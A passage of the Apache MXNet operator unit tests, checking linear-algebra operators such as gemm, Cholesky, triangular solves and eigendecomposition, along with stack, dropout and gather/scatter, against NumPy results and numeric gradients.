# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: test fails intermittently when cudnn on. temporarily disabled cudnn until gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
